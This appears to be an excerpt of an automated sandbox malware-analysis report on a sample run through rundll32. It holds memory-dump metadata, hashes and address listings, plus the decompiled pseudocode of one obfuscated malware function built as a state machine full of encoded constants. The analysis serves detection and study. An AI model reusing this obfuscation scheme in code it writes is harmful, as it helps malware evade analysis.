                                                                                                                    0x0034b51c
                                                                                                                    0x0034b527
                                                                                                                    0x0034b52f
                                                                                                                    0x0034b537
                                                                                                                    0x0034b53c
                                                                                                                    0x0034b544
                                                                                                                    0x0034b54c
                                                                                                                    0x0034b554
                                                                                                                    0x0034b55c
                                                                                                                    0x0034b564
                                                                                                                    0x0034b56c
                                                                                                                    0x0034b574
                                                                                                                    0x0034b579
                                                                                                                    0x0034b581
                                                                                                                    0x0034b589
                                                                                                                    0x0034b594
                                                                                                                    0x0034b59f
                                                                                                                    0x0034b5aa
                                                                                                                    0x0034b5b2
                                                                                                                    0x0034b5ba
                                                                                                                    0x0034b5c2
                                                                                                                    0x0034b5cc
                                                                                                                    0x0034b5d7
                                                                                                                    0x0034b5dc
                                                                                                                    0x0034b5e7
                                                                                                                    0x0034b5f2
                                                                                                                    0x0034b5fd
                                                                                                                    0x0034b608
                                                                                                                    0x0034b613
                                                                                                                    0x0034b61b
                                                                                                                    0x0034b620
                                                                                                                    0x0034b628
                                                                                                                    0x0034b62d
                                                                                                                    0x0034b635
                                                                                                                    0x0034b640
                                                                                                                    0x0034b648
                                                                                                                    0x0034b653
                                                                                                                    0x0034b65e
                                                                                                                    0x0034b672
                                                                                                                    0x0034b677
                                                                                                                    0x0034b680
                                                                                                                    0x0034b68b
                                                                                                                    0x0034b69d
                                                                                                                    0x0034b6a2
                                                                                                                    0x0034b6ab
                                                                                                                    0x0034b6b6
                                                                                                                    0x0034b6c1
                                                                                                                    0x0034b6cc
                                                                                                                    0x0034b6d4
                                                                                                                    0x0034b6df
                                                                                                                    0x0034b6e7
                                                                                                                    0x0034b6ef
                                                                                                                    0x0034b6f7
                                                                                                                    0x0034b6ff
                                                                                                                    0x0034b707
                                                                                                                    0x0034b70f
                                                                                                                    0x0034b714
                                                                                                                    0x0034b719
                                                                                                                    0x0034b721
                                                                                                                    0x0034b72d
                                                                                                                    0x0034b732
                                                                                                                    0x0034b738
                                                                                                                    0x0034b740
                                                                                                                    0x0034b748
                                                                                                                    0x0034b750
                                                                                                                    0x0034b75d
                                                                                                                    0x0034b75e
                                                                                                                    0x0034b762
                                                                                                                    0x0034b76d
                                                                                                                    0x0034b771
                                                                                                                    0x0034b779
                                                                                                                    0x0034b779
                                                                                                                    0x0034b779
                                                                                                                    0x0034b77e
                                                                                                                    0x0034b77e
                                                                                                                    0x0034b77e
                                                                                                                    0x0034b783
                                                                                                                    0x0034b783
                                                                                                                    0x0034b788
                                                                                                                    0x0034b788
                                                                                                                    0x0034b788
                                                                                                                    0x0034b788
                                                                                                                    0x0034b78a
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0034b790
                                                                                                                    0x0034b969
                                                                                                                    0x0034b96f
                                                                                                                    0x00000000
                                                                                                                    0x0034b796
                                                                                                                    0x0034b79c
                                                                                                                    0x0034b94a
                                                                                                                    0x00000000
                                                                                                                    0x0034b7a2
                                                                                                                    0x0034b7a8
                                                                                                                    0x0034b91c
                                                                                                                    0x0034b91d
                                                                                                                    0x0034b91e
                                                                                                                    0x0034b924
                                                                                                                    0x0034b926
                                                                                                                    0x0034b933
                                                                                                                    0x0034b938
                                                                                                                    0x0034b93b
                                                                                                                    0x0034b940
                                                                                                                    0x00000000
                                                                                                                    0x0034b7ae
                                                                                                                    0x0034b7b0
                                                                                                                    0x0034b8dc
                                                                                                                    0x0034b8e3
                                                                                                                    0x0034b8ef
                                                                                                                    0x0034b8f1
                                                                                                                    0x0034b8f6
                                                                                                                    0x0034b8fb
                                                                                                                    0x00000000
                                                                                                                    0x0034b7b6
                                                                                                                    0x0034b7bc
                                                                                                                    0x0034b7e9
                                                                                                                    0x0034b7f5
                                                                                                                    0x0034b803
                                                                                                                    0x0034b809
                                                                                                                    0x0034b866
                                                                                                                    0x0034b874
                                                                                                                    0x0034b877
                                                                                                                    0x0034b87c
                                                                                                                    0x0034b883
                                                                                                                    0x0034bada
                                                                                                                    0x0034bada
                                                                                                                    0x0034badf
                                                                                                                    0x0034bae4
                                                                                                                    0x00000000
                                                                                                                    0x0034b7be
                                                                                                                    0x0034b7c4
                                                                                                                    0x00000000
                                                                                                                    0x0034b7ca
                                                                                                                    0x0034b7dc
                                                                                                                    0x0034b7e2
                                                                                                                    0x0034b779
                                                                                                                    0x0034b779
                                                                                                                    0x0034b779
                                                                                                                    0x0034b77e
                                                                                                                    0x0034b77e
                                                                                                                    0x0034b783
                                                                                                                    0x00000000
                                                                                                                    0x0034b783
                                                                                                                    0x0034b779
                                                                                                                    0x0034b7c4
                                                                                                                    0x0034b7bc
                                                                                                                    0x0034b7b0
                                                                                                                    0x0034b7a8
                                                                                                                    0x0034b79c
                                                                                                                    0x0034bb18
                                                                                                                    0x0034bb22
                                                                                                                    0x0034bb22
                                                                                                                    0x0034b979
                                                                                                                    0x0034b97b
                                                                                                                    0x0034babf
                                                                                                                    0x0034bad0
                                                                                                                    0x0034bad3
                                                                                                                    0x0034bad5
                                                                                                                    0x0034bad7
                                                                                                                    0x00000000
                                                                                                                    0x0034b981
                                                                                                                    0x0034b981
                                                                                                                    0x0034b987
                                                                                                                    0x0034b9e7
                                                                                                                    0x0034b9f0
                                                                                                                    0x0034b9fb
                                                                                                                    0x0034ba00
                                                                                                                    0x0034ba0e
                                                                                                                    0x0034ba44
                                                                                                                    0x0034ba4b
                                                                                                                    0x0034ba57
                                                                                                                    0x0034ba68
                                                                                                                    0x0034ba6b
                                                                                                                    0x0034ba81
                                                                                                                    0x0034ba86
                                                                                                                    0x0034ba8d
                                                                                                                    0x00000000
                                                                                                                    0x0034b989
                                                                                                                    0x0034b989
                                                                                                                    0x0034b98f
                                                                                                                    0x0034bb0e
                                                                                                                    0x0034b995
                                                                                                                    0x0034b995
                                                                                                                    0x0034b997
                                                                                                                    0x00000000
                                                                                                                    0x0034b99d
                                                                                                                    0x0034b9c8
                                                                                                                    0x0034b9cf
                                                                                                                    0x0034b9d8
                                                                                                                    0x0034b9da
                                                                                                                    0x0034b9df
                                                                                                                    0x00000000
                                                                                                                    0x0034b9df
                                                                                                                    0x0034b997
                                                                                                                    0x0034b98f
                                                                                                                    0x0034b987
                                                                                                                    0x00000000
                                                                                                                    0x0034bae9
                                                                                                                    0x0034bae9
                                                                                                                    0x0034bae9
                                                                                                                    0x00000000
                                                                                                                    0x0034baf5
                                                                                                                    0x0034b783
                                                                                                                    0x0034b77e

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: &:,$&:,$&:,$&:,$/i=$GA$Kz\Q$W[o3$_}+$gkv$v$(a$ve$~ $#$1P
                                                                                                                    • API String ID: 0-1587349264
                                                                                                                    • Opcode ID: 29c587ff5f3a93c98e0763e2aac28b0c4224748a18c74eb70dbfdaf19f5969b1
                                                                                                                    • Instruction ID: 764e977c853de021438b2ce95aced3390aa512e79c7019afbe67b07859b35cf7
                                                                                                                    • Opcode Fuzzy Hash: 29c587ff5f3a93c98e0763e2aac28b0c4224748a18c74eb70dbfdaf19f5969b1
                                                                                                                    • Instruction Fuzzy Hash: 445210711093809FD7B9CF61C48AB8BBBE1BBC4304F10891DE6DA9A261D7B19949CF53
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00345CC4 Relevance: 16.7, Strings: 13, Instructions: 434COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 88%
                                                                                                                    			E00345CC4() {
				char _v520;
				char _v1040;
				char _v1560;
				void* _v1572;
				intOrPtr _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				signed int _v1760;
				signed int _v1764;
				void* _t481;
				signed int _t496;
				void* _t499;
				intOrPtr _t503;
				void* _t539;
				signed int _t550;
				signed int _t551;
				signed int _t552;
				intOrPtr _t553;
				intOrPtr* _t554;
				signed int _t555;
				signed int _t556;
				signed int _t557;
				signed int _t558;
				signed int _t559;
				signed int _t560;
				signed int _t561;
				signed int _t562;
				signed int _t563;
				signed int _t564;
				signed int _t567;
				signed int* _t568;
				void* _t572;

				_t568 =  &_v1764;
				_v1576 = 0x9a4c1d;
				_v1596 = _v1596 & 0x00000000;
				asm("stosd");
				_t499 = 0x9b91574;
				asm("stosd");
				asm("stosd");
				_v1684 = 0xe59dc4;
				_v1684 = _v1684 | 0xd0a48cbc;
				_v1684 = _v1684 + 0xffff2e59;
				_v1684 = _v1684 ^ 0xd0e4cc7c;
				_v1752 = 0x51b4b3;
				_v1752 = _v1752 ^ 0x5d9a17a0;
				_t550 = 0xb;
				_t555 = 0x76;
				_v1752 = _v1752 * 0xb;
				_v1752 = _v1752 ^ 0x54bb96eb;
				_v1752 = _v1752 ^ 0x53749705;
				_v1632 = 0xaf6c30;
				_v1632 = _v1632 << 6;
				_v1632 = _v1632 ^ 0x2bdb0c02;
				_v1720 = 0x499d0c;
				_v1720 = _v1720 | 0xb1a117f5;
				_v1720 = _v1720 / _t550;
				_v1720 = _v1720 + 0x97c7;
				_v1720 = _v1720 ^ 0x102d1aad;
				_v1704 = 0xc8e3b3;
				_v1704 = _v1704 * 0x32;
				_v1704 = _v1704 ^ 0x0819b8db;
				_v1704 = _v1704 | 0x44ca091a;
				_v1704 = _v1704 ^ 0x6fefc93f;
				_v1668 = 0xa62014;
				_v1668 = _v1668 | 0xeabb5dd4;
				_v1668 = _v1668 * 0x68;
				_v1668 = _v1668 ^ 0x5dcb1e30;
				_v1744 = 0xf6f234;
				_v1744 = _v1744 * 0x2a;
				_v1744 = _v1744 ^ 0x80b741fb;
				_v1744 = _v1744 / _t555;
				_v1744 = _v1744 ^ 0x0165dd5f;
				_v1584 = 0x312e96;
				_v1584 = _v1584 + 0xffff2d5f;
				_v1584 = _v1584 ^ 0x003c0d9d;
				_v1712 = 0xa058cf;
				_v1712 = _v1712 << 0xd;
				_v1712 = _v1712 >> 8;
				_t556 = 0x70;
				_v1712 = _v1712 / _t556;
				_v1712 = _v1712 ^ 0x000e60b1;
				_v1624 = 0xe892f9;
				_v1624 = _v1624 | 0x8c579b60;
				_v1624 = _v1624 ^ 0x8cfff2b4;
				_v1616 = 0xaf548d;
				_v1616 = _v1616 << 0xe;
				_v1616 = _v1616 ^ 0xd52eab36;
				_v1732 = 0xb05ea2;
				_v1732 = _v1732 * 0x22;
				_t557 = 0x7e;
				_v1732 = _v1732 / _t557;
				_t558 = 0x6e;
				_v1732 = _v1732 / _t558;
				_v1732 = _v1732 ^ 0x000d3439;
				_v1592 = 0x913a71;
				_v1592 = _v1592 + 0xffff7440;
				_v1592 = _v1592 ^ 0x0095b07c;
				_v1696 = 0x599322;
				_v1696 = _v1696 / _t550;
				_v1696 = _v1696 ^ 0xb13d8f34;
				_v1696 = _v1696 ^ 0xb1384542;
				_v1644 = 0xa16dfa;
				_v1644 = _v1644 ^ 0xe1099bcb;
				_v1644 = _v1644 ^ 0xe1a9d34e;
				_v1648 = 0xb4e11f;
				_v1648 = _v1648 ^ 0x38d2ca48;
				_v1648 = _v1648 ^ 0x386e0f93;
				_v1608 = 0x5a22b;
				_t559 = 0x77;
				_t551 = 0x6a;
				_v1608 = _v1608 * 0x7a;
				_v1608 = _v1608 ^ 0x02a61538;
				_v1680 = 0xefbd86;
				_v1680 = _v1680 ^ 0x59656a46;
				_v1680 = _v1680 + 0xffff500f;
				_v1680 = _v1680 ^ 0x598ded80;
				_v1724 = 0x3ee43e;
				_v1724 = _v1724 + 0x7543;
				_v1724 = _v1724 ^ 0x2e29824a;
				_v1724 = _v1724 + 0xffff57f4;
				_v1724 = _v1724 ^ 0x2e1fc8aa;
				_v1580 = 0xa6d208;
				_v1580 = _v1580 | 0x568c9bfe;
				_v1580 = _v1580 ^ 0x56ae214d;
				_v1636 = 0x6d5924;
				_v1636 = _v1636 ^ 0x925c239d;
				_v1636 = _v1636 ^ 0x923215a4;
				_v1664 = 0x695adc;
				_v1664 = _v1664 / _t559;
				_v1664 = _v1664 + 0x9e91;
				_v1664 = _v1664 ^ 0x000b7b12;
				_v1728 = 0x27fcd;
				_v1728 = _v1728 << 7;
				_v1728 = _v1728 >> 0xd;
				_v1728 = _v1728 / _t551;
				_v1728 = _v1728 ^ 0x000e8750;
				_v1660 = 0x324e38;
				_t560 = 0xd;
				_v1660 = _v1660 / _t560;
				_v1660 = _v1660 ^ 0xc6795c1b;
				_v1660 = _v1660 ^ 0xc67cbc2f;
				_v1672 = 0xd5264d;
				_v1672 = _v1672 ^ 0x5df7965f;
				_v1672 = _v1672 << 0xa;
				_v1672 = _v1672 ^ 0x8ac02156;
				_v1760 = 0x48e2ee;
				_t213 =  &_v1760; // 0x48e2ee
				_t561 = 0x2d;
				_v1760 =  *_t213 / _t561;
				_v1760 = _v1760 ^ 0xd2c1db30;
				_v1760 = _v1760 ^ 0xa53e2936;
				_v1760 = _v1760 ^ 0x77fe21cd;
				_v1740 = 0xf20c88;
				_v1740 = _v1740 / _t551;
				_v1740 = _v1740 | 0xd96c60ad;
				_v1740 = _v1740 << 0xc;
				_v1740 = _v1740 ^ 0xe68a7191;
				_v1588 = 0x8e0aab;
				_t562 = 0x1b;
				_v1588 = _v1588 * 0x60;
				_v1588 = _v1588 ^ 0x354c6054;
				_v1748 = 0x4e8d34;
				_v1748 = _v1748 + 0x9e68;
				_v1748 = _v1748 ^ 0xb589d4ed;
				_v1748 = _v1748 ^ 0xb12a6144;
				_v1748 = _v1748 ^ 0x04e7453a;
				_v1756 = 0x3003da;
				_v1756 = _v1756 << 2;
				_v1756 = _v1756 + 0x3550;
				_v1756 = _v1756 + 0xffff4840;
				_v1756 = _v1756 ^ 0x00bf12fa;
				_v1764 = 0x8da8e8;
				_v1764 = _v1764 * 0x70;
				_v1764 = _v1764 | 0x3d3a45ac;
				_v1764 = _v1764 + 0xffff8f06;
				_v1764 = _v1764 ^ 0x3dfaa955;
				_v1600 = 0x16815c;
				_v1600 = _v1600 | 0x74adb72e;
				_v1600 = _v1600 ^ 0x74bac2ad;
				_v1736 = 0x173f97;
				_v1736 = _v1736 + 0x884f;
				_v1736 = _v1736 ^ 0x83e17d26;
				_v1736 = _v1736 ^ 0x7950511a;
				_v1736 = _v1736 ^ 0xfaacae3a;
				_v1640 = 0x9a0364;
				_v1640 = _v1640 >> 4;
				_v1640 = _v1640 ^ 0x000747da;
				_v1700 = 0xbe1482;
				_v1700 = _v1700 ^ 0x7ff54444;
				_v1700 = _v1700 << 4;
				_v1700 = _v1700 + 0xffff3bda;
				_v1700 = _v1700 ^ 0xf4b38ed0;
				_v1708 = 0xf0c015;
				_v1708 = _v1708 >> 2;
				_v1708 = _v1708 * 0x59;
				_v1708 = _v1708 >> 0xd;
				_v1708 = _v1708 ^ 0x00007652;
				_v1628 = 0xfcf2a2;
				_v1628 = _v1628 + 0x310b;
				_v1628 = _v1628 ^ 0x00fb84b7;
				_v1716 = 0xcaf3e1;
				_v1716 = _v1716 ^ 0x58005d51;
				_v1716 = _v1716 / _t562;
				_v1716 = _v1716 << 0xb;
				_v1716 = _v1716 ^ 0x4f02f929;
				_v1688 = 0xa9bf16;
				_t563 = 0x35;
				_v1688 = _v1688 / _t563;
				_v1688 = _v1688 * 0x4f;
				_v1688 = _v1688 ^ 0x00ffa3e1;
				_v1692 = 0x1a52e4;
				_v1692 = _v1692 | 0xd338ade8;
				_v1692 = _v1692 + 0xffff9820;
				_v1692 = _v1692 ^ 0xd337a700;
				_v1652 = 0xe154f6;
				_v1652 = _v1652 ^ 0xa48feb80;
				_v1652 = _v1652 ^ 0xa466ad28;
				_v1676 = 0x84491a;
				_v1676 = _v1676 + 0x31b5;
				_v1676 = _v1676 + 0x8487;
				_v1676 = _v1676 ^ 0x0081059f;
				_v1604 = 0xb120c5;
				_t564 = 0x4b;
				_t552 = _v1596;
				_t567 = _v1596;
				_v1604 = _v1604 * 0x65;
				_v1604 = _v1604 ^ 0x45e4f2f6;
				_v1656 = 0x2a0a41;
				_v1656 = _v1656 << 0xc;
				_t498 = _v1596;
				_v1656 = _v1656 / _t564;
				_v1656 = _v1656 ^ 0x022e7e7e;
				_v1612 = 0x774513;
				_v1612 = _v1612 | 0x207416f8;
				_v1612 = _v1612 ^ 0x207b64ec;
				_v1620 = 0x205158;
				_v1620 = _v1620 << 0xd;
				_v1620 = _v1620 ^ 0x0a275bbe;
				while(1) {
					L1:
					while(1) {
						_t539 = 0x5c;
						do {
							while(1) {
								L3:
								_t572 = _t499 - 0xa8fcf9f;
								if(_t572 > 0) {
									break;
								}
								if(_t572 == 0) {
									E00348F9E(_v1688, _v1692, _v1652, _v1676, _t567);
									_t568 =  &(_t568[3]);
									goto L19;
								} else {
									if(_t499 == 0x4b40ba0) {
										_t553 =  *0x353e10; // 0x0
										_t554 = _t553 + 0x1c;
										while(1) {
											__eflags =  *_t554 - _t539;
											if( *_t554 == _t539) {
												break;
											}
											_t554 = _t554 + 2;
											__eflags = _t554;
										}
										_t552 = _t554 + 2;
										_t499 = 0x9c63280;
										continue;
									} else {
										if(_t499 == 0x7e93d80) {
											_t567 = E00331CEC(_v1740, _t552, _t499, _t499, _t552, _v1588, _t498, _v1748, _v1756, _v1764, _v1632, _v1704, _t499, _v1600, _v1668, _v1736, _t499, _v1720, _t499, _v1640,  &_v520);
											_t568 =  &(_t568[0x13]);
											__eflags = _t567;
											if(_t567 == 0) {
												L19:
												_t499 = 0xfa48365;
												_t539 = 0x5c;
												continue;
											} else {
												_t499 = 0xacc4ac0;
												_v1596 = 1;
												while(1) {
													_t539 = 0x5c;
													goto L3;
												}
											}
										} else {
											if(_t499 == 0x9b91574) {
												_push(_v1624);
												_push(_v1684);
												_push(_v1712);
												_push( &_v1560);
												E003446BB(_v1744, _v1584);
												_t568 = _t568 - 0xc + 0x1c;
												_t499 = 0xf66352a;
												while(1) {
													_t539 = 0x5c;
													goto L3;
												}
											} else {
												if(_t499 != 0x9c63280) {
													goto L27;
												} else {
													_t496 = E0033912C(_v1752, _v1728, _t499, _v1660, _t499, _v1672, _v1760);
													_t498 = _t496;
													_t568 =  &(_t568[5]);
													if(_t496 != 0) {
														_t499 = 0x7e93d80;
														while(1) {
															_t539 = 0x5c;
															goto L3;
														}
													}
												}
											}
										}
									}
								}
								L24:
								return _v1596;
							}
							__eflags = _t499 - 0xacc4ac0;
							if(_t499 == 0xacc4ac0) {
								E0033D6D8(_t567, _v1708, _t498, _v1628, _v1716);
								_t568 =  &(_t568[4]);
								_t499 = 0xa8fcf9f;
								_t539 = 0x5c;
								goto L27;
							} else {
								__eflags = _t499 - 0xf66352a;
								if(__eflags == 0) {
									_push(_v1592);
									_push(_v1732);
									_t481 = E0034DCF7(_v1616, 0x331020, __eflags);
									E0034176B( &_v1040, __eflags);
									_t503 =  *0x353e10; // 0x0
									_t431 = _t503 + 0x1c; // 0x1c
									_t432 = _t503 + 0x23c; // 0x23c
									E00341652(_v1644, __eflags, _t432, _t431, _v1648, _v1608, _t481, 0x104,  &_v520, _v1680,  &_v1560, _v1724,  &_v1040, _v1580);
									E0033A8B0(_v1636, _t481, _v1664);
									_t568 =  &(_t568[0xf]);
									_t499 = 0x4b40ba0;
									goto L1;
								} else {
									__eflags = _t499 - 0xfa48365;
									if(_t499 != 0xfa48365) {
										goto L27;
									} else {
										E00348F9E(_v1604, _v1656, _v1612, _v1620, _t498);
									}
								}
							}
							goto L24;
							L27:
							__eflags = _t499 - 0xd334e0e;
						} while (_t499 != 0xd334e0e);
						goto L24;
					}
				}
			}














































































                                                                                                                    0x00345cc4
                                                                                                                    0x00345cca
                                                                                                                    0x00345ce2
                                                                                                                    0x00345cea
                                                                                                                    0x00345cef
                                                                                                                    0x00345cf4
                                                                                                                    0x00345cf5
                                                                                                                    0x00345cf6
                                                                                                                    0x00345cfe
                                                                                                                    0x00345d06
                                                                                                                    0x00345d0e
                                                                                                                    0x00345d16
                                                                                                                    0x00345d1e
                                                                                                                    0x00345d2b
                                                                                                                    0x00345d2e
                                                                                                                    0x00345d31
                                                                                                                    0x00345d35
                                                                                                                    0x00345d3d
                                                                                                                    0x00345d45
                                                                                                                    0x00345d50
                                                                                                                    0x00345d58
                                                                                                                    0x00345d63
                                                                                                                    0x00345d6b
                                                                                                                    0x00345d7b
                                                                                                                    0x00345d7f
                                                                                                                    0x00345d87
                                                                                                                    0x00345d8f
                                                                                                                    0x00345d9c
                                                                                                                    0x00345da0
                                                                                                                    0x00345da8
                                                                                                                    0x00345db0
                                                                                                                    0x00345db8
                                                                                                                    0x00345dc0
                                                                                                                    0x00345dcd
                                                                                                                    0x00345dd1
                                                                                                                    0x00345dd9
                                                                                                                    0x00345de6
                                                                                                                    0x00345dea
                                                                                                                    0x00345dfa
                                                                                                                    0x00345dfe
                                                                                                                    0x00345e06
                                                                                                                    0x00345e11
                                                                                                                    0x00345e1c
                                                                                                                    0x00345e27
                                                                                                                    0x00345e2f
                                                                                                                    0x00345e34
                                                                                                                    0x00345e3d
                                                                                                                    0x00345e40
                                                                                                                    0x00345e44
                                                                                                                    0x00345e4c
                                                                                                                    0x00345e57
                                                                                                                    0x00345e62
                                                                                                                    0x00345e6d
                                                                                                                    0x00345e78
                                                                                                                    0x00345e80
                                                                                                                    0x00345e8b
                                                                                                                    0x00345e9a
                                                                                                                    0x00345ea4
                                                                                                                    0x00345ea9
                                                                                                                    0x00345eb3
                                                                                                                    0x00345eb8
                                                                                                                    0x00345ebc
                                                                                                                    0x00345ec4
                                                                                                                    0x00345ecf
                                                                                                                    0x00345eda
                                                                                                                    0x00345ee5
                                                                                                                    0x00345ef5
                                                                                                                    0x00345efb
                                                                                                                    0x00345f03
                                                                                                                    0x00345f0b
                                                                                                                    0x00345f16
                                                                                                                    0x00345f21
                                                                                                                    0x00345f2c
                                                                                                                    0x00345f37
                                                                                                                    0x00345f42
                                                                                                                    0x00345f4d
                                                                                                                    0x00345f60
                                                                                                                    0x00345f63
                                                                                                                    0x00345f66
                                                                                                                    0x00345f6d
                                                                                                                    0x00345f78
                                                                                                                    0x00345f80
                                                                                                                    0x00345f88
                                                                                                                    0x00345f90
                                                                                                                    0x00345f98
                                                                                                                    0x00345fa0
                                                                                                                    0x00345fa8
                                                                                                                    0x00345fb0
                                                                                                                    0x00345fb8
                                                                                                                    0x00345fc0
                                                                                                                    0x00345fcb
                                                                                                                    0x00345fd6
                                                                                                                    0x00345fe1
                                                                                                                    0x00345fec
                                                                                                                    0x00345ff7
                                                                                                                    0x00346002
                                                                                                                    0x00346012
                                                                                                                    0x00346016
                                                                                                                    0x0034601e
                                                                                                                    0x00346026
                                                                                                                    0x0034602e
                                                                                                                    0x00346033
                                                                                                                    0x00346040
                                                                                                                    0x00346044
                                                                                                                    0x0034604c
                                                                                                                    0x00346058
                                                                                                                    0x0034605b
                                                                                                                    0x0034605f
                                                                                                                    0x00346067
                                                                                                                    0x0034606f
                                                                                                                    0x00346077
                                                                                                                    0x0034607f
                                                                                                                    0x00346084
                                                                                                                    0x0034608e
                                                                                                                    0x00346096
                                                                                                                    0x0034609c
                                                                                                                    0x003460a1
                                                                                                                    0x003460a5
                                                                                                                    0x003460ad
                                                                                                                    0x003460b5
                                                                                                                    0x003460bd
                                                                                                                    0x003460cd
                                                                                                                    0x003460d3
                                                                                                                    0x003460db
                                                                                                                    0x003460e0
                                                                                                                    0x003460e8
                                                                                                                    0x003460fb
                                                                                                                    0x003460fe
                                                                                                                    0x00346105
                                                                                                                    0x00346110
                                                                                                                    0x00346118
                                                                                                                    0x00346120
                                                                                                                    0x00346128
                                                                                                                    0x00346130
                                                                                                                    0x00346138
                                                                                                                    0x00346140
                                                                                                                    0x00346145
                                                                                                                    0x0034614d
                                                                                                                    0x00346155
                                                                                                                    0x0034615d
                                                                                                                    0x0034616a
                                                                                                                    0x0034616e
                                                                                                                    0x00346176
                                                                                                                    0x0034617e
                                                                                                                    0x00346186
                                                                                                                    0x00346191
                                                                                                                    0x0034619c
                                                                                                                    0x003461a7
                                                                                                                    0x003461af
                                                                                                                    0x003461b7
                                                                                                                    0x003461bf
                                                                                                                    0x003461c7
                                                                                                                    0x003461cf
                                                                                                                    0x003461da
                                                                                                                    0x003461e2
                                                                                                                    0x003461ed
                                                                                                                    0x003461f5
                                                                                                                    0x003461fd
                                                                                                                    0x00346202
                                                                                                                    0x0034620a
                                                                                                                    0x00346212
                                                                                                                    0x0034621a
                                                                                                                    0x00346224
                                                                                                                    0x00346228
                                                                                                                    0x0034622d
                                                                                                                    0x00346235
                                                                                                                    0x00346240
                                                                                                                    0x0034624b
                                                                                                                    0x00346256
                                                                                                                    0x0034625e
                                                                                                                    0x0034626e
                                                                                                                    0x00346272
                                                                                                                    0x00346277
                                                                                                                    0x0034627f
                                                                                                                    0x0034628b
                                                                                                                    0x0034628e
                                                                                                                    0x00346297
                                                                                                                    0x0034629b
                                                                                                                    0x003462a3
                                                                                                                    0x003462ab
                                                                                                                    0x003462b5
                                                                                                                    0x003462bd
                                                                                                                    0x003462c5
                                                                                                                    0x003462d0
                                                                                                                    0x003462db
                                                                                                                    0x003462e6
                                                                                                                    0x003462ee
                                                                                                                    0x003462f6
                                                                                                                    0x003462fe
                                                                                                                    0x00346306
                                                                                                                    0x0034631b
                                                                                                                    0x0034631c
                                                                                                                    0x00346323
                                                                                                                    0x0034632a
                                                                                                                    0x00346331
                                                                                                                    0x0034633c
                                                                                                                    0x00346344
                                                                                                                    0x0034634f
                                                                                                                    0x00346356
                                                                                                                    0x0034635a
                                                                                                                    0x00346362
                                                                                                                    0x0034636d
                                                                                                                    0x00346378
                                                                                                                    0x00346383
                                                                                                                    0x0034638e
                                                                                                                    0x00346396
                                                                                                                    0x003463a1
                                                                                                                    0x003463a1
                                                                                                                    0x003463a6
                                                                                                                    0x003463a8
                                                                                                                    0x003463a9
                                                                                                                    0x003463a9
                                                                                                                    0x003463a9
                                                                                                                    0x003463a9
                                                                                                                    0x003463ab
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x003463b1
                                                                                                                    0x003464ef
                                                                                                                    0x003464f4
                                                                                                                    0x00000000
                                                                                                                    0x003463b7
                                                                                                                    0x003463bd
                                                                                                                    0x003464bb
                                                                                                                    0x003464c1
                                                                                                                    0x003464c9
                                                                                                                    0x003464c9
                                                                                                                    0x003464cc
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x003464c6
                                                                                                                    0x003464c6
                                                                                                                    0x003464c6
                                                                                                                    0x003464ce
                                                                                                                    0x003464d1
                                                                                                                    0x00000000
                                                                                                                    0x003463c3
                                                                                                                    0x003463c9
                                                                                                                    0x0034649d
                                                                                                                    0x0034649f
                                                                                                                    0x003464a2
                                                                                                                    0x003464a4
                                                                                                                    0x003464f7
                                                                                                                    0x003464f7
                                                                                                                    0x003463a8
                                                                                                                    0x00000000
                                                                                                                    0x003464a6
                                                                                                                    0x003464a6
                                                                                                                    0x003464ab
                                                                                                                    0x003463a6
                                                                                                                    0x003463a8
                                                                                                                    0x00000000
                                                                                                                    0x003463a8
                                                                                                                    0x003463a6
                                                                                                                    0x003463cb
                                                                                                                    0x003463d1
                                                                                                                    0x00346411
                                                                                                                    0x0034641f
                                                                                                                    0x00346423
                                                                                                                    0x00346435
                                                                                                                    0x00346436
                                                                                                                    0x0034643b
                                                                                                                    0x0034643e
                                                                                                                    0x003463a6
                                                                                                                    0x003463a8
                                                                                                                    0x00000000
                                                                                                                    0x003463a8
                                                                                                                    0x003463d3
                                                                                                                    0x003463d9
                                                                                                                    0x00000000
                                                                                                                    0x003463df
                                                                                                                    0x003463f8
                                                                                                                    0x003463fd
                                                                                                                    0x003463ff
                                                                                                                    0x00346404
                                                                                                                    0x0034640a
                                                                                                                    0x003463a6
                                                                                                                    0x003463a8
                                                                                                                    0x00000000
                                                                                                                    0x003463a8
                                                                                                                    0x003463a6
                                                                                                                    0x00346404
                                                                                                                    0x003463d9
                                                                                                                    0x003463d1
                                                                                                                    0x003463c9
                                                                                                                    0x003463bd
                                                                                                                    0x00346546
                                                                                                                    0x00346557
                                                                                                                    0x00346557
                                                                                                                    0x00346501
                                                                                                                    0x00346507
                                                                                                                    0x00346619
                                                                                                                    0x0034661e
                                                                                                                    0x00346621
                                                                                                                    0x00346625
                                                                                                                    0x00000000
                                                                                                                    0x0034650d
                                                                                                                    0x0034650d
                                                                                                                    0x00346513
                                                                                                                    0x00346558
